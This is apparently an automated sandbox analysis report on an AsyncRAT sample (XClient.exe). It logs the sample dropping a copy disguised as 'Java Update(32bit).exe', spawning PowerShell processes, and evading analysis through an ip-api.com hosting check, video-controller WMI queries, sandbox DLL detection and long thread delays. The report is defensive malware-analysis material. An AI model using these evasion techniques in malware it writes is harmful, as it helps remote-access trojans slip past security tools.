Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Java Update(32bit).exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: XClient.exe, 00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: XClient.exe, Java Update(32bit).exe.0.dr	Binary or memory string: SBIEDLL.DLLINFO

Source: C:\Users\user\Desktop\XClient.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Memory allocated: 1B310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: CC0000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: D50000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 2090000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 1A2A0000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 13F0000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 1B070000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\ProgramData\Java Update(32bit).exe	Memory allocated: 1B110000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\XClient.exe	Window / User API: threadDelayed 5217	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Window / User API: threadDelayed 4620	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6560	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3200	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8169	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1408	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7179	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2403	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1272

Source: C:\Users\user\Desktop\XClient.exe TID: 7776	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 8169 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 1408 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep count: 7179 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep count: 2403 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2008	Thread sleep count: 8352 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1352	Thread sleep count: 1272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\ProgramData\Java Update(32bit).exe TID: 7668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Java Update(32bit).exe TID: 5016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Java Update(32bit).exe TID: 5868	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Java Update(32bit).exe TID: 7584	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\XClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\Java Update(32bit).exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\Java Update(32bit).exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\Java Update(32bit).exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\Java Update(32bit).exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\Java Update(32bit).exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\Java Update(32bit).exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
